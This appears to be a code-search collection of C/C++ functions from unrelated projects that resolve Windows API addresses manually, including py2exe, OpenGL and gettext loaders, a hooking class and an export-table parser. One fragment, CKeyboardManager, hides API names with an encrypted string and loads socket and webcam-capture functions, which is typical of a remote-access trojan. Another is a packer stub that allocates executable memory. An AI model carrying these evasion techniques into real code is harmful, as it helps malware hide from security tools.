int _load_python(char *dllname, char *bytes) { int i; struct IMPORT *p = imports; HMODULE hmod; ULONG_PTR cookie = 0; if (!bytes) return _load_python_FromFile(dllname); cookie = _My_ActivateActCtx();//try some windows manifest magic... //hmod = MemoryLoadLibrary(bytes); hmod = MyLoadLibrary(dllname, bytes, NULL); _My_DeactivateActCtx(cookie); if (hmod == NULL) { return 0; } for (i = 0; p->name; ++i, ++p) { //p->proc = (void (*)())MemoryGetProcAddress(hmod, p->name); p->proc = (void (*)())MyGetProcAddress(hmod, p->name); if (p->proc == NULL) { OutputDebugString("undef symbol"); dfprint(stderr, "undefined symbol %s -> exit(-1)\n", p->name); return 0; } } return 1; }
//************************************************************ // 函数名称: InitFun // 函数说明: 初始化函数指针和变量 // 作 者: cyxvc // 时 间: 2015/12/28 // 返 回 值: void //************************************************************ void InitFun() { //从Kenel32中获取函数 HMODULE hKernel32 = GetKernel32Addr(); g_pfnGetProcAddress = (fnGetProcAddress)MyGetProcAddress(); g_pfnLoadLibraryA = (fnLoadLibraryA)g_pfnGetProcAddress(hKernel32, "LoadLibraryA"); g_pfnGetModuleHandleA = (fnGetModuleHandleA)g_pfnGetProcAddress(hKernel32, "GetModuleHandleA"); g_pfnVirtualProtect = (fnVirtualProtect)g_pfnGetProcAddress(hKernel32, "VirtualProtect"); g_pfnExitProcess = (fnExitProcess)g_pfnGetProcAddress(hKernel32, "ExitProcess"); g_pfnVirtualAlloc = (fnVirtualAlloc)g_pfnGetProcAddress(hKernel32, "VirtualAlloc"); //从user32中获取函数 HMODULE hUser32 = g_pfnLoadLibraryA("user32.dll"); g_pfnMessageBoxA = (fnMessageBox)g_pfnGetProcAddress(hUser32, "MessageBoxA"); //初始化镜像基址 dwImageBase = (DWORD)g_pfnGetModuleHandleA(NULL); // g_pTRUEIAT = (PDWORD)g_pfnVirtualAlloc(0, sizeof(DWORD)*g_stcShellData.dwNumOfIATFuns, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); dwTemp1 = sizeof(DWORD)+3; dwTemp2 = sizeof(DWORD)-1; dwTemp3 = sizeof(DWORD)*sizeof(DWORD)-dwTemp2; }
ApiHook::ApiHook(LPCTSTR moduleName, LPCSTR functionName, LPVOID replacement) : _installed(false), _reroute(0), _moduleName(moduleName), _functionName(functionName), _bytesMoved(0) { HMODULE mh = ::GetModuleHandle(moduleName); if (mh != nullptr) { // using custom getprocaddress to avoid tools that hook getprocaddress (like AcLayer) _origPos = (LPVOID)(MyGetProcAddress(mh, functionName)); } else { Logger::Instance().error("%s is not a valid module name", moduleName); throw std::runtime_error("hook failed"); } if (_origPos == nullptr) { Logger::Instance().error("%s is not a function in %ls", functionName, moduleName); throw std::runtime_error("hook failed"); } _fdisasm.Init(reinterpret_cast<LPBYTE>(_origPos)); if (!Hook(_origPos, replacement)) { Logger::Instance().error("%s in %s can not be hooked", functionName, moduleName); throw std::runtime_error("hook failed"); } _installed = true; LOGDEBUG("hook for %s installed at %p (trampoline at %p)", functionName, _origPos, _reroute); }
BOOL CKeyboardManager::MyFuncInitialization() { HMODULE hKernel32 = (HMODULE)GetKernelModule(); MyLoadLibrary = (pLoadLibraryA)MyGetProAddress( hKernel32, "LoadLibraryA" ); if (!MyLoadLibrary) return FALSE; ////////////////////////////////////////////////////////////////////////// //获取GetProcAddress地址 char str1[50] = "7YhLjo[=XXjYkk"; EncryptData((unsigned char *)&str1, ::lstrlen(str1), ENCODEKEY+2); ////////////////////////////////////////////////////////////////////////// MyGetProcAddress = (pGetProcAddress)MyGetProAddress( hKernel32, str1 ); if (!MyGetProcAddress) return FALSE; HMODULE hWs2_32 = MyLoadLibrary("Ws2_32.dll"); HMODULE hAVICAP32 = MyLoadLibrary("AVICAP32.dll"); /////////////////////////////////////////////////////////////////////////////////////////////////////// MyGetSystemDirectory = (pGetSystemDirectoryA)MyGetProAddress( hKernel32, "GetSystemDirectoryA" ); if (!MyGetSystemDirectory) return FALSE; MySleep = (pSleep)MyGetProAddress( hKernel32, "Sleep" ); if (!MySleep) return FALSE; Mylstrcat = (plstrcatA)MyGetProAddress( hKernel32, "lstrcatA" ); if (!Mylstrcat) return FALSE; MyGetTempPath = (pGetTempPathA)MyGetProAddress( hKernel32, "GetTempPathA" ); if (!MyGetTempPath) return FALSE; MySetFilePointer = (pSetFilePointer)MyGetProAddress( hKernel32, "SetFilePointer" ); if (!MySetFilePointer) return FALSE; MyMoveFile = (pMoveFileA)MyGetProAddress( hKernel32, "MoveFileA" ); if (!MyMoveFile) return FALSE; MyGetShortPathName = (pGetShortPathNameA)MyGetProAddress( hKernel32, "GetShortPathNameA" ); if (!MyGetShortPathName) return FALSE; MyGetModuleFileName = (pGetModuleFileNameA)MyGetProAddress( hKernel32, "GetModuleFileNameA" ); if (!MyGetModuleFileName) return FALSE; /////////////////////////////////////////////////////////////////////////////////////////////////////// Myclosesocket = (pclosesocket)MyGetProcAddress(hWs2_32,"closesocket"); if (!Myclosesocket) return FALSE; Mysend = (psend)MyGetProcAddress(hWs2_32,"send"); if (!Mysend) return FALSE; /////////////////////////////////////////////////////////////////////////////////////////////////////// MycapGetDriverDescription = (pcapGetDriverDescriptionA)MyGetProcAddress(hAVICAP32,"capGetDriverDescriptionA"); if (!MycapGetDriverDescription) return FALSE; MycapCreateCaptureWindow = (pcapCreateCaptureWindowA)MyGetProcAddress(hAVICAP32,"capCreateCaptureWindowA"); if (!MycapCreateCaptureWindow) return FALSE; return TRUE; }
//The function to get the pointers. void* MyGetGLFunctionAddress(const char* functionName) { void* result = (void*)MyGetProcAddress(functionName); //Some drivers return -1, 1, 2 or 3 (instead of 0). if (result == (void*)-1 || result == (void*)1 || result == (void*)2 || result == (void*)3) result = (void*)0; return result; }
// The function to get the pointers void* MyGetGLFuncAddress(const char* fname) { void* pret = (void*) MyGetProcAddress(fname); // Some drivers return -apart from 0-, -1, 1, 2 or 3 if ( pret == (void*)-1 || pret == (void*)1 || pret == (void*)2 || pret == (void*)3 ) pret = (void*)0; return pret; }
static void deinit_library(HMODULE) { #if defined(__AIX__) && defined(__GNUC__) dlerror(); // Clear the error state. typedef void (*free_proc_type)(); free_proc_type free_proc = (free_proc_type)MyGetProcAddress(dll_hand, "_GLOBAL__DD"); if (free_proc) free_proc(); #endif }
static PyObject * import_module(PyObject *self, PyObject *args) { char *initfuncname; char *modname; char *pathname; HMODULE hmem; FARPROC init_func; ULONG_PTR cookie = 0; PyObject *findproc; /* code, initfuncname, fqmodulename, path */ if (!PyArg_ParseTuple(args, "sssO:import_module", &modname, &pathname, &initfuncname, &findproc)) return NULL; cookie = _My_ActivateActCtx();//try some windows manifest magic... hmem = MyLoadLibrary(pathname, NULL, findproc); _My_DeactivateActCtx(cookie); if (!hmem) { char *msg; FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (void *)&msg, 0, NULL); msg[strlen(msg)-2] = '\0'; PyErr_Format(PyExc_ImportError, "MemoryLoadLibrary failed loading %s: %s (%d)", pathname, msg, GetLastError()); LocalFree(msg); /* PyErr_Format(PyExc_ImportError, */ /* "MemoryLoadLibrary failed loading %s (Error %d loading %s)", */ /* pathname, GetLastError(), LastErrorString); */ /* PyErr_Format(PyExc_ImportError, */ /* "MemoryLoadLibrary failed loading %s", pathname); */ return NULL; } init_func = MyGetProcAddress(hmem, initfuncname); if (do_import(init_func, modname) < 0) { MyFreeLibrary(hmem); return NULL; } /* Retrieve from sys.modules */ return PyImport_ImportModule(modname); }
FARPROC MyFindProcAddress(LPCSTR modulename, LPCSTR procname) { HCUSTOMMODULE mod = MyGetModuleHandle(modulename); void *addr = NULL; dprintf("MyFindProcAddress(%s, %s) -> %p\n", modulename, procname, mod); if (mod) { addr = MyGetProcAddress(mod, procname); } dprintf("MyFindProcAddress(%s, %s) -> %p\n", modulename, procname, addr); return addr; }
LPVOID MyGetProcAddress(HMODULE module, LPCSTR functionName) { PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)module; if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { return nullptr; } PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(((LPBYTE)dosHeader) + dosHeader->e_lfanew); if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) { return nullptr; } PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader; PIMAGE_DATA_DIRECTORY dataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((DWORD)dosHeader + dataDirectory->VirtualAddress); ULONG *addressOfNames = (ULONG*)((BYTE*) module + exportDirectory->AddressOfNames); ULONG *funcAddr = (ULONG*)((BYTE*) module + exportDirectory->AddressOfFunctions); for (DWORD i = 0; i < exportDirectory->NumberOfNames; ++i) { char *curFunctionName = (char*)((BYTE*) module + addressOfNames[i]); USHORT *nameOrdinals = (USHORT*)((BYTE*) module + exportDirectory->AddressOfNameOrdinals); if (strcmp(functionName, curFunctionName) == 0) { if (funcAddr[nameOrdinals[i]] >= dataDirectory->VirtualAddress && funcAddr[nameOrdinals[i]] < dataDirectory->VirtualAddress + dataDirectory->Size) { char *forwardLibName = _strdup((LPSTR)module + funcAddr[nameOrdinals[i]]); char *forwardFunctionName = strchr(forwardLibName, '.'); *forwardFunctionName = 0; ++forwardFunctionName; HMODULE forwardLib = ::LoadLibraryA(forwardLibName); LPVOID forward = nullptr; if (forwardLib != nullptr) { forward = MyGetProcAddress(forwardLib, forwardFunctionName); ::FreeLibrary(forwardLib); } return forward; } return (void*)((BYTE*)module + funcAddr[nameOrdinals[i]]); } } return nullptr; }
/* c:\Python34\include\Python.h PyAPI_DATA(int) Py_DebugFlag; PyAPI_DATA(int) Py_VerboseFlag; PyAPI_DATA(int) Py_QuietFlag; PyAPI_DATA(int) Py_InteractiveFlag; PyAPI_DATA(int) Py_InspectFlag; PyAPI_DATA(int) Py_OptimizeFlag; PyAPI_DATA(int) Py_NoSiteFlag; PyAPI_DATA(int) Py_BytesWarningFlag; PyAPI_DATA(int) Py_UseClassExceptionsFlag; PyAPI_DATA(int) Py_FrozenFlag; PyAPI_DATA(int) Py_IgnoreEnvironmentFlag; PyAPI_DATA(int) Py_DontWriteBytecodeFlag; PyAPI_DATA(int) Py_NoUserSiteDirectory; PyAPI_DATA(int) Py_UnbufferedStdioFlag; PyAPI_DATA(int) Py_HashRandomizationFlag; PyAPI_DATA(int) Py_IsolatedFlag; */ void set_vars(HMODULE hmod_pydll) { int *pflag; /* I'm not sure if the unbuffered code really works... */ if (p_script_info->unbuffered) { _setmode(_fileno(stdin), O_BINARY); _setmode(_fileno(stdout), O_BINARY); setvbuf(stdin, (char *)NULL, _IONBF, 0); setvbuf(stdout, (char *)NULL, _IONBF, 0); setvbuf(stderr, (char *)NULL, _IONBF, 0); pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_UnbufferedStdioFlag"); if (pflag) *pflag = 1; } pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_IsolatedFlag"); if (pflag) *pflag = 1; pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_NoSiteFlag"); if (pflag) *pflag = 1; pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_IgnoreEnvironmentFlag"); if (pflag) *pflag = 1; pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_NoUserSiteDirectory"); if (pflag) *pflag = 1; pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_OptimizeFlag"); if (pflag) *pflag = p_script_info->optimize; pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_VerboseFlag"); if (pflag) { if (getenv("PY2EXE_VERBOSE")) *pflag = atoi(getenv("PY2EXE_VERBOSE")); else *pflag = 0; } }
/**************************************************************** * Helper functions for MemoryLoadLibraryEx */ static FARPROC _GetProcAddress(HCUSTOMMODULE module, LPCSTR name, void *userdata) { return MyGetProcAddress(module, name); }
static int load_dll (void) { if (f_hinstDll) return 1; if (f_failed) return 0; f_failed=1; memset(&f_gettext_fncs, 0, sizeof(f_gettext_fncs)); if (!f_dllpath[0]) { /* no requested path, try defaults */ int i; for (i=0; i<sizeof(f_defaults)/sizeof(f_defaults[0]); ++i) { if ((f_hinstDll = LoadLibrary(f_defaults[i]))!=NULL) { strncpy(f_dllpath, f_defaults[i], sizeof(f_dllpath)); break; } } } else { f_hinstDll = LoadLibrary(f_dllpath); } if (!f_hinstDll) return 0; f_gettext_fncs.gettext_x = (gettext_type)MyGetProcAddress(f_hinstDll, "gettext"); f_gettext_fncs.dgettext_x = (dgettext_type)MyGetProcAddress(f_hinstDll, "dgettext"); f_gettext_fncs.dcgettext_x = (dcgettext_type)MyGetProcAddress(f_hinstDll, "dcgettext"); f_gettext_fncs.ngettext_x = (ngettext_type)MyGetProcAddress(f_hinstDll, "ngettext"); f_gettext_fncs.dngettext_x = (dngettext_type)MyGetProcAddress(f_hinstDll, "dngettext"); f_gettext_fncs.dcngettext_x = (dcngettext_type)MyGetProcAddress(f_hinstDll, "dcngettext"); f_gettext_fncs.textdomain_x = (textdomain_type)MyGetProcAddress(f_hinstDll, "textdomain"); f_gettext_fncs.bindtextdomain_x = (bindtextdomain_type)MyGetProcAddress(f_hinstDll, "bindtextdomain"); f_gettext_fncs.bind_textdomain_codeset_x = (bind_textdomain_codeset_type)MyGetProcAddress(f_hinstDll, "bind_textdomain_codeset"); f_gettext_fncs.gt_notify_language_change_x = (gt_notify_language_change_type)MyGetProcAddress(f_hinstDll, "gt_notify_language_change"); f_gettext_fncs.gt_get_property_x = (gt_get_property_type)MyGetProcAddress(f_hinstDll, "gt_get_property"); f_gettext_fncs.gt_set_property_x = (gt_set_property_type)MyGetProcAddress(f_hinstDll, "gt_set_property"); f_failed=0; return 1; }